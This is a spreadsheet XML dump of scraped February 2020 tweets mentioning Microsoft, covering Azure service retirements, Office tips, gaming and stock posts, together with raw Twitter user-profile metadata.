    <t>{'id': 869631917632610305, 'id_str': '869631917632610305', 'name': 'âœï¸ðŸ‡ºðŸ‡¸ChhhJ77ðŸ‡ºðŸ‡¸âœ¡ï¸', 'screen_name': '4pawdrive72', 'location': '', 'description': 'Donald J Trump #WWG1WGA #KAG2020 | #Q Free Thinker | Seek the Truth | 65 million will not go quietly in the night ðŸ—½âš–ï¸ðŸ”« If you donâ€™t FB, I wonâ€™t FB', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 8459, 'friends_count': 8960, 'listed_count': 1, 'created_at': 'Tue May 30 19:09:40 +0000 2017', 'favourites_count': 26004, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 20671, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1210635972569899008/ZH0BS70C_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1210635972569899008/ZH0BS70C_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/869631917632610305/1577473084',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</si>
  <si>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18:27:06 +0000 2020</t>
  </si>
  <si>
    <t>Surface Duo may let you 'peek' at notifications https://t.co/igHiMiknky #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 18:25:06 +0000 2020</t>
  </si>
  <si>
    <t>Everything you need to know about #M365 for #compliance #ediscovery and #datagovernance is in this workshop from @ConsilioGlobal #handsonlearning #microsoft #mastersconf #legaltech https://t.co/zy0PDollgt</t>
  </si>
  <si>
    <t>{'id': 27678663, 'id_str': '27678663', 'name': "The Master's Conferenceâ„¢", 'screen_name': 'MastersConf', 'location': 'Worldwide', 'description': "Events for Master's of: #lawfirms, @corpcounsel @legaltech @eDiscovery #InfoManagement #InfoGov #PredictiveCoding @BigData #cybersecurity #law #cyber #Wie #ibm", 'url': 'https://t.co/6ROAxiCBxd', 'entities': {'url': {'urls': [{'url': 'https://t.co/6ROAxiCBxd', 'expanded_url': 'http://www.themastersconference.com', 'display_url': 'themastersconference.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4935, 'friends_count': 4104, 'listed_count': 252, 'created_at': 'Mon Mar 30 16:51:49 +0000 2009', 'favourites_count': 1583, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 32438, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'B5101E', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1200516974985523200/pis2xuAX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1200516974985523200/pis2xuAX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/27678663/1578327927', 'profile_link_color': 'E81C4F', 'profile_sidebar_border_color': 'C0DEED', 'profile_sidebar_fill_color': 'DDEEF6', 'profile_text_color': '050505', 'profile_use_background_image': False, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 18:24:27 +0000 2020</t>
  </si>
  <si>
    <t>Apps teach you how to react and behave. An app teaches you which buttons to push by pushing. your buttons. Thats one reason I prefer my own apps.
#programmign #behavior #life #apple #microsoft #philosophy</t>
  </si>
  <si>
    <t>{'id': 730883, 'id_str': '730883', 'name': 'Archimage', 'screen_name': 'Archimage', 'location': 'Dover, DE', 'description': 'iOS Dev., author/writer, thought provoker, blogger, and other stuff.', 'url': 'https://t.co/sRXxxB4QlF', 'entities': {'url': {'urls': [{'url': 'https://t.co/sRXxxB4QlF', 'expanded_url': 'http://auteureist.com', 'display_url': 'auteureist.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1151, 'friends_count': 501, 'listed_count': 378, 'created_at': 'Tue Jan 30 06:33:41 +0000 2007', 'favourites_count': 5733, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 96472,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'http://pbs.twimg.com/profile_images/199645005/archmage_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/199645005/archmage_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/730883/1403357084',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</si>
  <si>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Feb 26 18:24:19 +0000 2020</t>
  </si>
  <si>
    <t>WonderLaura: Introducing #Microsoft Graph Capabilities with jthake  - Lightning Tools https://t.co/06jL8Gu5sq by lightningtools</t>
  </si>
  <si>
    <t>Wed Feb 26 18:24:00 +0000 2020</t>
  </si>
  <si>
    <t>Azure StorSimple 8000/1200 series will no longer be supported starting December 31, 2022
- retire your StorSimple 8000/1200 series devices
- migrate to Azure File Sync
https://t.co/8Rl1RCPphG
#Azure #Microsoft #Cloud #Storage #StorSimple #EOL https://t.co/EbG5LADxMG</t>
  </si>
  <si>
    <t>Wed Feb 26 18:21:57 +0000 2020</t>
  </si>
  <si>
    <t>How to use Internet Explorer 11 in #Windows 10 - https://t.co/5QW2uwyXse #Guide #Microsoft #IT #techblogger #mblogger #techygeekshome https://t.co/SNxjOeYsfr</t>
  </si>
  <si>
    <t>Wed Feb 26 18:20:27 +0000 2020</t>
  </si>
  <si>
    <t>Were retiring some @AzSiteRecovery support options on March 1, 2023
- Between customer-owned sites managed by System Center Virtual Machine Manager (SCVMM)
- From sites managed by SCVMM to Azure
https://t.co/kzUDmqEg1T
#Azure #Microsoft #Cloud #DisasterRecovery #BCDR #ASR #SCVMM https://t.co/HfEIi6JCrZ</t>
  </si>
  <si>
    <t>Wed Feb 26 18:18:27 +0000 2020</t>
  </si>
  <si>
    <t>I've been using the new web-based #Microsoft @Outlook  today - I must say it's so much nicer to use than #gsuite. @Google is losing their edge on innovation - major props to @satyanadella for turning $MSFT around :D</t>
  </si>
  <si>
    <t>{'id': 123835999, 'id_str': '123835999', 'name': 'cyruskind.eth', 'screen_name': 'cyruskind', 'location': 'Earth', 'description': "#Servant #Entrepreneur. I bake cakes. I play hockey. That's where the #paradox ends and my #imagination begins. #ecommerce #socialmedia #lean #agile #blockchain", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 289, 'friends_count': 545, 'listed_count': 8, 'created_at': 'Wed Mar 17 10:48:46 +0000 2010', 'favourites_count': 1003, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 816,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'http://pbs.twimg.com/profile_images/910227239421190144/lD_52XTo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/910227239421190144/lD_52XTo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/123835999/1520391658',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</si>
  <si>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18:17:28 +0000 2020</t>
  </si>
  <si>
    <t>Re: New learning templates in Excel https://t.co/Z61PyKBbl8 #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 18:17:27 +0000 2020</t>
  </si>
  <si>
    <t>Re: 10 Excel Tricks you did not yet know https://t.co/CZbgSUVgsS #Microsoft</t>
  </si>
  <si>
    <t>Re: Announcing Office Scripts (Preview) https://t.co/kNZzRy3kXz #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 18:17:26 +0000 2020</t>
  </si>
  <si>
    <t>Re: Announcing Office Scripts (Preview) https://t.co/OIdPAVIP7t #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 18:17:20 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Makes Azure Sphere GA To Secure IoT Devices
https://t.co/WbbBsSBz35
#cybersecurity #security #ceptbiro #securite  #cybersecurite  #infosec #Microsoft #AzureSphere #IoT</t>
  </si>
  <si>
    <t>Wed Feb 26 18:17:11 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Makes Azure Sphere GA To Secure IoT Devices
https://t.co/3SDfNIsgxc
#cybersecurity #security #ceptbiro #securite  #cybersecurite  #infosec #Microsoft #AzureSphere #IoT</t>
  </si>
  <si>
    <t>Wed Feb 26 18:17:02 +0000 2020</t>
  </si>
  <si>
    <t>Were retiring some Azure Site Recovery support options on March 1, 2023 https://t.co/tKyhbNnkpA #Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Wed Feb 26 18:17:01 +0000 2020</t>
  </si>
  <si>
    <t>Azure StorSimple 8000/1200 series will no longer be supported starting December 31, 2022 https://t.co/XEpZgm2Hag #Microsoft #Azure #Cloud</t>
  </si>
  <si>
    <t>Wed Feb 26 18:16:36 +0000 2020</t>
  </si>
  <si>
    <t>We have just found a new suspicious domain.
Domain: licenses-microsoft[.]com
IP: 83[.]164[.]146[.]83
bot-tweet #phishing #cybersecurity #microsoft https://t.co/gXs7yvfQB5</t>
  </si>
  <si>
    <t>Wed Feb 26 18:14:34 +0000 2020</t>
  </si>
  <si>
    <t>Nice, is your code ready to handle leap years? - https://t.co/B9sRZ1I7mA #microsoft #leapYear</t>
  </si>
  <si>
    <t>Wed Feb 26 18:14:07 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve"> #Azure Updates: Azure StorSimple 8000/1200 series will no longer be supported starting December 31, 2022
#Microsoft #MicrosoftAzure #ITSpecialistPro
https://t.co/y9Ln8Pjq7G</t>
  </si>
  <si>
    <t xml:space="preserve"> #Azure Updates: Were retiring some Azure Site Recovery support options on March 1, 2023
#Microsoft #MicrosoftAzure #ITSpecialistPro
https://t.co/aFB32OUgE5</t>
  </si>
  <si>
    <t>Wed Feb 26 18:11:53 +0000 2020</t>
  </si>
  <si>
    <t>A good read on , most important execs at #Microsoft under Satya Nadella https://t.co/9YvNyjoIpP #MSFT</t>
  </si>
  <si>
    <t>{'id': 90943294, 'id_str': '90943294', 'name': 'Yusuf  Azizullah', 'screen_name': 'Yusuf_11', 'location': 'Washington, DC', 'description': 'GBAC CEO, Board related @Wef columnist, work with #Global500 #Chairs, #CEOs &amp; #tech #Billionaires. #Chairman @TOLFoundation &amp; @bcombridges, Global Exec Edu Prof', 'url': 'https://t.co/xy7NB3X8tB', 'entities': {'url': {'urls': [{'url': 'https://t.co/xy7NB3X8tB', 'expanded_url': 'http://www.globalboardadvisors.com', 'display_url': 'globalboardadvisors.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3073, 'friends_count': 4964, 'listed_count': 264, 'created_at': 'Wed Nov 18 19:47:51 +0000 2009', 'favourites_count': 1637, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7025, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '052636', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1136709904989937664/cRie3Oxi_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1136709904989937664/cRie3Oxi_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/90943294/1544580197', 'profile_link_color': '4A913C',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</si>
  <si>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18:11:32 +0000 2020</t>
  </si>
  <si>
    <t>Azure StorSimple 8000/1200 series will no longer be supported starting December 31, 2022  https://t.co/PK7pSsIpod   #Azure #Microsoft #Cloud #Roadmap  #azureflashnews</t>
  </si>
  <si>
    <t>Were retiring some Azure Site Recovery support options on March 1, 2023  https://t.co/R2Iu6p7Wwf   #Azure #Microsoft #Cloud #Roadmap  #azureflashnews</t>
  </si>
  <si>
    <t>Wed Feb 26 18:10:18 +0000 2020</t>
  </si>
  <si>
    <t>Check Out:
Predator: Hunting Grounds
Free Trial
March 27-29, 2020
#PS4 #PS4share
#Windows #PC #Crossplay #EpicGames #Microsoft
https://t.co/ZnxxUQLBMJ</t>
  </si>
  <si>
    <t>{'id': 304563520, 'id_str': '304563520', 'name': 'DJFixit', 'screen_name': 'DJFixIt', 'location': 'Winnipeg, Manitoba', 'description': 'Movie, TV, entertainment, and video game aficionado.', 'url': 'https://t.co/XgV9Re3gvY', 'entities': {'url': {'urls': [{'url': 'https://t.co/XgV9Re3gvY', 'expanded_url': 'http://www.twitch.tv/djfixit', 'display_url': 'twitch.tv/djfixit', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 161, 'friends_count': 1067, 'listed_count': 13, 'created_at': 'Tue May 24 18:39:14 +0000 2011', 'favourites_count': 2775, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4016,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'http://pbs.twimg.com/profile_images/588831960937598976/lTAfNt5V_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/588831960937598976/lTAfNt5V_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/304563520/1429223611',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</si>
  <si>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18:09:22 +0000 2020</t>
  </si>
  <si>
    <t>.@NetMotion joins the #Microsoft Intelligent #Security Association (MISA) as a connectivity and security solutions partner. Details here: https://t.co/P0qylMWp6n #mobility https://t.co/GFCWDlCyN5</t>
  </si>
  <si>
    <t>Wed Feb 26 18:03:49 +0000 2020</t>
  </si>
  <si>
    <t>@iDevOpsio Work from home life? #devopslife #aws #azure #microsoft #linux #apple #osx https://t.co/Eeb5FpFYeF</t>
  </si>
  <si>
    <t>{'id': 28278184, 'id_str': '28278184', 'name': 'SNOmad1', 'screen_name': 'mokaonly87', 'location': 'Rockies', 'description': 'Canadian loving Colorado. Starve the Ego feed the Soul : )\n\nCo-founder https://t.co/e35X6aoj8Z', 'url': 'https://t.co/QhWWJ2eZQV', 'entities': {'url': {'urls': [{'url': 'https://t.co/QhWWJ2eZQV', 'expanded_url': 'http://www.idevops.io', 'display_url': 'idevops.io', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/e35X6aoj8Z', 'expanded_url': 'http://iDevOPS.io', 'display_url': 'iDevOPS.io', 'indices': [71, 94]}]}}, 'protected': False, 'followers_count': 533, 'friends_count': 160, 'listed_count': 30, 'created_at': 'Thu Apr 02 04:04:24 +0000 2009', 'favourites_count': 8238, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 9322,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'http://pbs.twimg.com/profile_images/733829707309809664/EUXjQ2_S_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/733829707309809664/EUXjQ2_S_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/28278184/1493088012', 'profile_link_color': '981CEB',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</si>
  <si>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Feb 26 18:00:26 +0000 2020</t>
  </si>
  <si>
    <t>#MicrosoftTeams is full of possibility for your organisation; but what should you do...and not do? Here are a few tips to get you started with the tool: https://t.co/hBKKN9VHB9 
#MicrosoftTeamsHelp #Microsoft #Teams #Collaboration #Office365</t>
  </si>
  <si>
    <t>Wed Feb 26 18:00:14 +0000 2020</t>
  </si>
  <si>
    <t>Introducing #Microsoft Graph Capabilities with @jthake  - Lightning Tools https://t.co/cysCyL50Hv by @lightningtools</t>
  </si>
  <si>
    <t>Wed Feb 26 18:00:09 +0000 2020</t>
  </si>
  <si>
    <t>Respond to your customers needs in real time with #dynamics365.  https://t.co/hQrhL7VHu8
#d365 #microsoftpartner #microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 18:00:04 +0000 2020</t>
  </si>
  <si>
    <t>How safe is eVoting? how reliable? and will the error margin truly be reduced? will it discriminate against senior citizenship, or incentivate youngsters to vote? #Microsoft #ElectionGuard #Innovation #ACINMilan #US #Voting https://t.co/cjS3zqL1My</t>
  </si>
  <si>
    <t>Wed Feb 26 18:00:03 +0000 2020</t>
  </si>
  <si>
    <t>Good context and coverage on the recent announcement from #Microsoft and others regarding corporate action on #climate change initiatives . . . https://t.co/ZVda4RA0gn</t>
  </si>
  <si>
    <t>{'id': 33629092, 'id_str': '33629092', 'name': 'John shaw', 'screen_name': 'JohnEShaw', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 10, 'friends_count': 55, 'listed_count': 0, 'created_at': 'Mon Apr 20 19:25:31 +0000 2009', 'favourites_count': 20, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/648320521361223680/Zyb7Tgnf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/648320521361223680/Zyb7Tgnf_normal.jpg',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</si>
  <si>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17:59:29 +0000 2020</t>
  </si>
  <si>
    <t>Another #PlatinumTrophy Achieved!!
#Borderlands3 complete, time to move on to #TheDivision2 
.
.
.
Tags:
#support #RarityGames #gaming #games #nerd #nerdlife #Gamer4life #gamerlife #sony #microsoft #nintendo #ps4... https://t.co/8QBxugfbkI</t>
  </si>
  <si>
    <t>Wed Feb 26 17:58:04 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft released new distributed solution for ML frameworks.  
ZeRO &amp;amp; DeepSpeed: New system optimizations enable training models with over 100 billion parameters https://t.co/TjxYVh8gOE</t>
  </si>
  <si>
    <t>{'id': 1193785565235339265, 'id_str': '1193785565235339265', 'name': 'Liana Valdes', 'screen_name': 'ValdesLiana', 'location': '', 'description': 'PhD candidate at @FIUSCIS Florida International University.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 47, 'listed_count': 0, 'created_at': 'Mon Nov 11 07:00:39 +0000 2019', 'favourites_count': 16,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'http://pbs.twimg.com/profile_images/1193786235346702338/gGT4ikiH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1193786235346702338/gGT4ikiH_normal.jpg',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</si>
  <si>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17:51:26 +0000 2020</t>
  </si>
  <si>
    <t>Azure Virtual Network service endpoint policies feature is now available  https://t.co/0GFLPTFQYH  #azure #microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 17:50:53 +0000 2020</t>
  </si>
  <si>
    <t>1 new repository created in Microsoft
- 1 coredns
 #GitHub #OpenSource #microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 17:47:40 +0000 2020</t>
  </si>
  <si>
    <t>A6:  I think organizations can help themselves in several ways: leverage all the learning tools put out by #Microsoft &amp;amp; community folks via breakout sessions, blogs, webinars, codedumps, etc. also engaging w/ companies who are leading in these efforts to at very least #CollabTalk</t>
  </si>
  <si>
    <t>{'id': 33642599, 'id_str': '33642599', 'name': 'Fabian Williams ðŸ‡¯ðŸ‡²ðŸ‡ºðŸ‡¸ ðŸ‘¨ðŸ¾\u200dðŸ’»', 'screen_name': 'fabianwilliams', 'location': 'Washington, DC', 'description': '@VisualStudio MVP, @azurefunctions @Azure Dev. #MLAI i blog at https://t.co/dpHd07gF5E #Jamaican born former @USMC #homechef #motorcyclist #thoughtleader', 'url': 'https://t.co/NRLRl0Zlm3', 'entities': {'url': {'urls': [{'url': 'https://t.co/NRLRl0Zlm3', 'expanded_url': 'http://fabiangwilliams.com', 'display_url': 'fabiangwilliams.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/dpHd07gF5E', 'expanded_url': 'http://www.fabiangwilliams.com', 'display_url': 'fabiangwilliams.com', 'indices': [63, 86]}]}}, 'protected': False, 'followers_count': 6914, 'friends_count': 697, 'listed_count': 453, 'created_at': 'Mon Apr 20 20:05:22 +0000 2009', 'favourites_count': 6871, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 31597,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True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1225946865402892289/nnVsggCX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1225946865402892289/nnVsggCX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/33642599/1432735133', 'profile_link_color': '981CEB',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</si>
  <si>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Wed Feb 26 17:47:08 +0000 2020</t>
  </si>
  <si>
    <t>Upcoming changes to the Azure AD sign-in experience https://t.co/cw4glQQfhV #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 17:43:27 +0000 2020</t>
  </si>
  <si>
    <t>ICYMI: #Microsofts GitHub Storing #Bitcoin (#BTC) Code in Arctic Vault for 1,000 Years
https://t.co/VnVLNIJnL6 https://t.co/wQN8kOfqYu</t>
  </si>
  <si>
    <t>Wed Feb 26 17:43:12 +0000 2020</t>
  </si>
  <si>
    <t>Azure Virtual Network service endpoint policies feature is now available  https://t.co/dCkFd2eP2G  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Wed Feb 26 17:41:37 +0000 2020</t>
  </si>
  <si>
    <t>Day 56/366. 2002/2/24.
#VideoGameCollection #Games #Gaming #Microsoft #Xbox #PlatinumHits #PacManWorld2 #PacMan #Namco @ Greensboro, North Carolina https://t.co/OGCAnPwyPt</t>
  </si>
  <si>
    <t>Wed Feb 26 17:41:31 +0000 2020</t>
  </si>
  <si>
    <t>Azure Virtual Network service endpoint policies feature is now available  https://t.co/dCkFd2eP2G   #Azure #Microsoft #Cloud #Roadmap  #azureflashnews</t>
  </si>
  <si>
    <t>Wed Feb 26 17:38:30 +0000 2020</t>
  </si>
  <si>
    <t>#grey is the queen of #colors because she makes everyone else look good. #fashionblogger #clothes #savileroy #actor #beingkashmir #office #blessed #cashmere #delhi #designer #bespoke #google #microsoft... https://t.co/YKBpuWjisx</t>
  </si>
  <si>
    <t>{'id': 101417987, 'id_str': '101417987', 'name': 'Savileroy', 'screen_name': 'savileroy', 'location': 'New Delhi', 'description': 'Savileroy is a name synonymous with masculine elegance, time-honored tradition &amp; discreet luxury! Bespoke Made to Measure! https://t.co/3VW1ZjDoAr', 'url': 'http://t.co/27M0a9qT1y', 'entities': {'url': {'urls': [{'url': 'http://t.co/27M0a9qT1y', 'expanded_url': 'http://www.savileroy.com', 'display_url': 'savileroy.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/3VW1ZjDoAr', 'expanded_url': 'https://savileroybespoke.blogspot.in/', 'display_url': 'savileroybespoke.blogspot.in', 'indices': [123, 146]}]}}, 'protected': False, 'followers_count': 60, 'friends_count': 66, 'listed_count': 3, 'created_at': 'Sun Jan 03 06:39:49 +0000 2010', 'favourites_count': 30, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 93,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'http://pbs.twimg.com/profile_images/2697390142/114c89601f8da5dc8372488cac5d4e3d_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2697390142/114c89601f8da5dc8372488cac5d4e3d_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/101417987/1456899529',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</si>
  <si>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Wed Feb 26 17:38:02 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 17:37:22 +0000 2020</t>
  </si>
  <si>
    <t>#HomeTime after a great day in Milton Keynes with the @IMCloud_UK team. So many exciting plans starting to come to fruition and so much happening. Exciting times ahead!! 
#ingrammicro #microsoft #dynamics365 #azure #office365 #microsoft365 #microsoftpartnernetwork #happy https://t.co/AJfoEwvxAJ</t>
  </si>
  <si>
    <t>Wed Feb 26 17:36:19 +0000 2020</t>
  </si>
  <si>
    <t>Want to know how to optimize @Microsoft Office 365 license usage &amp;amp; minimize costs? Read more about the differences between Office Pro Plus &amp;amp; Business
https://t.co/QWh1EL83BM
#DMSiTech #MSOffice365 #Microsoft #office365 https://t.co/6bCpQpFqwZ</t>
  </si>
  <si>
    <t>{'id': 2190888270, 'id_str': '2190888270', 'name': 'DMS iTech', 'screen_name': 'DMSiTech', 'location': 'Edmonton, Alberta, Canada', 'description': 'Secure. Available. Accessible. DMS iTech delivers IT', 'url': 'http://t.co/1kaQzDwwZl', 'entities': {'url': {'urls': [{'url': 'http://t.co/1kaQzDwwZl', 'expanded_url': 'http://www.dmsitech.com', 'display_url': 'dmsitech.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 78, 'friends_count': 133, 'listed_count': 10, 'created_at': 'Tue Nov 12 19:10:28 +0000 2013', 'favourites_count': 28, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 442,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'http://pbs.twimg.com/profile_images/378800000731888060/262cd59726381714ea9cf18b82d8c94b_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000731888060/262cd59726381714ea9cf18b82d8c94b_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2190888270/1560981638', 'profile_link_color': '479307',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</si>
  <si>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Wed Feb 26 17:35:29 +0000 2020</t>
  </si>
  <si>
    <t>The Brokers at GSIMarkets whould like to inform you that: Microsoft Corp (MSFT) stock rose by 1.1662%! Currently priced at 170.03. https://t.co/TmbeSjmU8x #Microsoft #MSFT #Stocks #Stockprices #GSIMarkets</t>
  </si>
  <si>
    <t>Wed Feb 26 17:35:19 +0000 2020</t>
  </si>
  <si>
    <t>Azure Virtual Network service endpoint policies feature is now available https://t.co/lSWdRCEnRy #Microsoft #Azure</t>
  </si>
  <si>
    <t>Wed Feb 26 17:34:41 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Azure Update: Azure Virtual Network service endpoint policies feature is now available https://t.co/nU7N3fknG1</t>
  </si>
  <si>
    <t>Wed Feb 26 17:33:35 +0000 2020</t>
  </si>
  <si>
    <t>26- #Microsoft environment today #RSAC https://t.co/BHZrHKiCJX</t>
  </si>
  <si>
    <t>{'id': 24173513, 'id_str': '24173513', 'name': 'Dr. Emin Ä°slam TATLI', 'screen_name': 'eitatli', 'location': 'Ä°stanbul, TÃ¼rkiye', 'description': '@Turkcell Director of Cyber Security', 'url': 'https://t.co/jiL9uWzLr4', 'entities': {'url': {'urls': [{'url': 'https://t.co/jiL9uWzLr4', 'expanded_url': 'https://www.turkcell.com.tr', 'display_url': 'turkcell.com.tr', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1802, 'friends_count': 1321, 'listed_count': 40, 'created_at': 'Fri Mar 13 13:54:38 +0000 2009', 'favourites_count': 1737, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1961,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'http://pbs.twimg.com/profile_images/1232058456326180864/5Gdpyvbp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232058456326180864/5Gdpyvbp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/24173513/1573667873',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</si>
  <si>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17:32:57 +0000 2020</t>
  </si>
  <si>
    <t>Thanks a ton for featuring me @IamPablo @MSFTImagine 
Do check out the Microsoft Student Partner India Summit Recap at https://t.co/vr10GnPLHl
#MSFTStudentPartner #Microsoft #studentdev #MSP #code #dev https://t.co/Q6T9hKGx8T</t>
  </si>
  <si>
    <t>Wed Feb 26 17:32:27 +0000 2020</t>
  </si>
  <si>
    <t>Azure Virtual Network service endpoint policies feature is now available: https://t.co/Qxq9vgVwlZ #Azure #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 17:31:35 +0000 2020</t>
  </si>
  <si>
    <t>Even our favourite #Microsoft hasn't escaped the ravages of #coronavirus but it's still in buy on our system. See chart. Key: above the cloud "In Buy" below "In Sell". #DJIA #NASDAQ100 #COVID19 #stocks #trading212 #investment #investors #money #charts #fintech #fintwit https://t.co/FIlegWW0pY</t>
  </si>
  <si>
    <t>{'id': 1079749795823214594, 'id_str': '1079749795823214594', 'name': 'The Flying Stocksman', 'screen_name': 'flyingstocksman', 'location': 'Manchester, England', 'description': 'Simple long/short investment strategy with strict risk management. \nDisciple of Brian Marber and Peter Brandt \nNot advice\nHope to inform', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 595, 'friends_count': 960, 'listed_count': 10, 'created_at': 'Mon Dec 31 14:43:06 +0000 2018', 'favourites_count': 241, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2481, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1079750998044889090/uq-c6v7y_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1079750998044889090/uq-c6v7y_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1079749795823214594/1577050295',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</si>
  <si>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17:31:33 +0000 2020</t>
  </si>
  <si>
    <t>A4: IDK, refer to my #CollabTalk A2 really, I think there are many choices but the common theme is that its heading into a world of #automation and our decision making for those tasks are enhanced by #machinelearning and #ai &amp;amp; on that note I think #Microsoft is doing a great job</t>
  </si>
  <si>
    <t>Wed Feb 26 17:31:03 +0000 2020</t>
  </si>
  <si>
    <t>Azure Virtual Network service endpoint policies feature is now available https://t.co/wtyfhcr9iw  #Microsoft #Azure #AzureUpdates</t>
  </si>
  <si>
    <t>Wed Feb 26 17:30:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Dynamnics CRM Developer at #LosAngeles CA
https://t.co/bx2dV6Y8lh</t>
  </si>
  <si>
